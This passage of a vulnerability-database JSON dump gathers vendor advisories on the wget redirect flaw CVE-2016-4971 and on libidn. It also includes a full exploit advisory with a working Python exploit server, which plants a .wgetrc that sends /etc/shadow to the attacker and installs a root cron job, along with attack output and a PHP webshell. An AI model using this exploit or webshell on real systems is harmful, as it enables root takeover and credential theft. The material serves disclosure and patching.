Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.25-2+deb7u1.\n\nWe recommend that you upgrade your libidn packages.\n- -- \nBrian May &lt;bam@debian.org&gt;\n", "modified": "2016-05-17T22:43:49", "published": "2016-05-17T22:43:49", "id": "DEBIAN:DLA-476-1:61871", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201605/msg00029.html", "title": "[SECURITY] [DLA 476-1] libidn security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:51", "bulletinFamily": "unix", "description": "The wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue. Upstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "modified": "2018-04-12T03:31:39", "published": "2016-11-03T10:07:15", "id": "RHSA-2016:2587", "href": "https://access.redhat.com/errata/RHSA-2016:2587", "type": "redhat", "title": "(RHSA-2016:2587) Moderate: wget security and bug fix update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-10-29T16:42:14", "bulletinFamily": "unix", "description": "### Background\n\nGNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Wget. Please review the CVE identifier and bug reports referenced for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU Wget users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/wget-1.18\"", "modified": "2016-10-29T00:00:00", "published": "2016-10-29T00:00:00", "href": "https://security.gentoo.org/glsa/201610-11", "id": "GLSA-201610-11", "type": "gentoo", "title": "GNU Wget: Multiple vulnerabilities", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "bulletinFamily": "unix", "description": "GNU Wget when supplied with a malicious website link can be tricked\ninto saving an arbitrary remote file supplied by an attacker, with\narbitrary content and filename under the current directory. This can\nlead to potential code execution by creating system scripts (such as\n.bash_profile and others) within home directory as well as other\nunauthorized actions (such as request sniffing by proxy modification,\nor arbitrary system file retrieval) by uploading .wgetrc configuration\nfile.\nBecause of this vulnerability, an attacker is able to overwrite an\narbitrary file in the victim's current directory.", "modified": "2016-06-20T00:00:00", "published": "2016-06-20T00:00:00", "id": "ASA-201606-19", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-June/000654.html", "title": "wget: arbitrary file overwrite", "type": "archlinux", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-08T23:45:07", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "id": "1337DAY-ID-25433", "href": "https://0day.today/exploit/description/25433", "type": "zdt", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n \r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nBecause of lack of sufficient controls in wget, when user downloads a file \r\nwith wget, such as:\r\n \r\nwget http://attackers-server/safe_file.txt\r\n \r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining FTP server reference in response to the victim's wget request. \r\n \r\nFor example, if the attacker's server replies with the following response:\r\n \r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n \r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n \r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n \r\nExecution flow:\r\n \r\n[email\u00a0protected]:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n \r\n[email\u00a0protected]:~$ pwd\r\n/home/victim\r\n \r\n[email\u00a0protected]:~$ ls\r\n[email\u00a0protected]:~$ \r\n \r\n[email\u00a0protected]:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n \r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n \r\n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55]\r\n \r\n \r\n[email\u00a0protected]:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\n[email\u00a0protected]:~$ \r\n \r\n \r\nThis vulnerability will not work if extra options that force destination\r\nfilename are specified as a paramter. Such as: -O /tmp/output\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n \r\nAnother limitation is that attacker exploiting this vulnerability can only\r\nupload his malicious file to the current directory from which wget was run, \r\nor to a directory specified by -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from home directory, or\r\nwithin web document root (in which case attacker could write malicious php files\r\nor .bash_profile files).\r\n \r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n \r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n \r\n \r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n \r\ndir_prefix = string\r\n Top of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122.\r\n \r\npost_file = file\r\n Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122.\r\n \r\nrecursive = on/off\r\n Recursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122.\r\n \r\ntimestamping = on/off\r\n Allows to overwrite existing files.\r\n \r\ncut_dirs = n\r\n Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\r\n \r\nhttp_proxy \r\n HTTP Proxy server\r\n \r\nhttps_proxy \r\n HTTPS Proxy server\r\n \r\noutput_document = file\r\n Set the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122.\r\n \r\ninput = file\r\n Read the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122.\r\n \r\nmetalink-over-http\r\n Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n \r\n \r\n \r\nFull list of .wgetrc options can be found in:\r\n \r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n \r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n \r\n1) Cronjob with wget scenario\r\n \r\nOften wget is used inside cronjobs. By default cronjobs run within home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew version of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n \r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n \r\nSuch setup could be abused by attackers to upload .bash_profile file through\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. \r\n \r\nAs cron runs priodically attackers, could also write out .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them an almost instant root code \r\nexecution.\r\n \r\n \r\nIt is worth noting that if an attacker had access to local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n \r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n \r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n \r\n \r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n \r\nThe root cronjob on the victim server may look as follows:\r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n \r\n \r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n \r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n \r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n \r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n \r\n \r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n \r\n#!/usr/bin/env python\r\n \r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n \r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n \r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://[email\u00a0protected]%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n \r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n \r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n \r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n \r\n return\r\n \r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n \r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n \r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n \r\nprint \"Ready? Is your FTP server running?\"\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n \r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n \r\nhandler.serve_forever()\r\n \r\n \r\n---[ eof ]---\r\n \r\n \r\n \r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n \r\nThe output should look similar to:\r\n \r\n \r\n---[ wget-exploit.py output ]---\r\n \r\nattackers-server# python ./wget-exploit.py \r\n \r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n \r\nServing wget exploit on port 80...\r\n \r\n \r\nWe have a volunteer requesting /database.db by GET :)\r\n \r\nUploading .wgetrc via ftp redirect vuln. It should land in /root \r\n \r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://[email\u00a0protected]:21/.wgetrc \r\n \r\nWe have a volunteer requesting /database.db by POST :)\r\n \r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n \r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n \r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n \r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n \r\n---[ output eof ]---\r\n \r\n \r\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n \r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n \r\n[email\u00a0protected]:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\n \r\n2) PHP web application scenario\r\n \r\nIf wget is used within a PHP script e.g.:\r\n \r\n<?php\r\n \r\n// Update geoip data\r\n \r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\"); \r\n \r\n?>\r\n \r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n \r\n<?php\r\n //webshell.php\r\n \r\n system($_GET['cmd']);\r\n?>\r\n \r\nby using the wget-exploit script described in example 1.\r\n \r\nAfter the upload he could simply execute the script and their shell\r\ncommand by a GET request to:\r\n \r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker access remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto root user if wget is run via root cronjob as it is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe networ who are able to intercept/modify the network traffic.\r\n \r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n \r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n \r\nX. CREDITS\r\n-------------------------\r\n \r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25433"}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:03", "bulletinFamily": "software", "description": "USN-3012-1 Wget vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu, wget\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nDawid Golunski discovered that Wget incorrectly handled filenames when being redirected from an HTTP to an FTP URL. A malicious server could possibly use this issue to overwrite local files.\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * Cloud Foundry cflinuxfs2 versions prior to 1.67.0 \n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.17 AND other versions prior to 3232.12 are vulnerable \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * Upgrade to Cloud Foundry cflinuxfs2 versions 1.67.0 or later \n * The Cloud Foundry team has released patched BOSH stemcells 3146.17 and 3232.12 with an upgraded Linux kernel that resolves the aforementioned issues. We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.17 OR other versions to 3232.12 \n\n# Credit\n\nDawid Golunski\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-3012-1/>\n * <http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-4971>\n * <https://bosh.io/stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n", "modified": "2016-07-13T00:00:00", "published": "2016-07-13T00:00:00", "id": "CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", "href": "https://www.cloudfoundry.org/blog/usn-3012-1/", "title": "USN-3012-1 Wget vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "software", "description": "USN-3068-1 Libidn vulnerabilities\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu, libidn\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nThijs Alkemade, Gustavo Grieco, Daniel Stenberg, and Nikos Mavrogiannopoulos discovered that Libidn incorrectly handled invalid UTF-8 characters. A remote attacker could use this issue to cause Libidn to crash, resulting in a denial of service, or possibly disclose sensitive memory. ([CVE-2015-2059](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-2059.html>))\n\nHanno B\u00f6ck discovered that Libidn incorrectly handled certain input. A remote attacker could possibly use this issue to cause Libidn to crash, resulting in a denial of service. ([CVE-2015-8948](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8948.html>), [CVE-2016-6262](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6262.html>), [CVE-2016-6261](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6261.html>), [ CVE-2016-6263](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6263.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.21 AND 3232.x versions prior to 3232.19 AND other versions prior to 3262.12 are vulnerable\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.78.0\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team has released patched BOSH stemcells 3146.21 and 3232.19 with an upgraded Linux kernel that resolves the aforementioned issues. We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.21 OR 3232.x versions to 3232.19\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.78.0 or later versions\n\n# Credit\n\nThijs Alkemade, Hanno B\u00f6ck, Gustavo Grieco, Nikos Mavrogiannopoulos, and Daniel Stenberg\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-3068-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-2059.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8948.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6261.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6262.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6263.html>\n", "modified": "2016-11-08T00:00:00", "published": "2016-11-08T00:00:00", "id": "CFOUNDRY:7564F58510B8A05C74D232728F162219", "href": "https://www.cloudfoundry.org/blog/usn-3068-1/", "title": "USN-3068-1 Libidn vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:07", "bulletinFamily": "unix", "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/wget-1.18-i486-1_slack14.1.txz: Upgraded.\n This version fixes a security vulnerability present in all old versions\n of wget. On a server redirect from HTTP to a FTP resource, wget would\n trust the HTTP server and use the name in the redirected URL as the\n destination filename. This behaviour was changed and now it works\n similarly as a redirect from HTTP to another HTTP resource so the original\n name is used as the destination file. To keep the previous behaviour the\n user must provide --trust-server-names.\n The vulnerability was discovered by Dawid Golunski and was reported by\n Beyond Security's SecuriTeam.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/wget-1.18-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/wget-1.18-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/wget-1.18-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/wget-1.18-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/wget-1.18-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/wget-1.18-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/wget-1.18-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/wget-1.18-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/wget-1.18-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/wget-1.18-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/wget-1.18-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/wget-1.18-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n3451af5dd9ca74a1d7e87a1da83c093f wget-1.18-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ndf8555176d34c6df44790758a70151ad wget-1.18-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n03635033880d7e70c9c27a59d5f8b672 wget-1.18-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n254e001d584854f80f8f009afc36ed31 wget-1.18-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n2568c74e7419e9ef1678158fd4af8e2f wget-1.18-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n6ef91a6cec6685127850af5f2042a54b wget-1.18-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n93d82f4a1fb5a7c27c4541df137a0357 wget-1.18-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n74ea3507a02545c6bef589b1b2f1290a wget-1.18-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nbcab953b2e8d04050b169b203909b01e wget-1.18-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nbc0a058112f39befdac64f6143c2da03 wget-1.18-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n90695857776fb20742a931a774347de6 n/wget-1.18-i586-1.txz\n\nSlackware x86_64 -current package:\n11b4a09faf7636f65d3c6d25b2c9eba1 n/wget-1.18-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg wget-1.18-i486-1_slack14.1.txz", "modified": "2016-06-13T00:12:06", "published": "2016-06-13T00:12:06", "id": "SSA-2016-165-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.532542", "title": "wget", "type": "slackware", "cvss": {"score": 4.3, "vector": 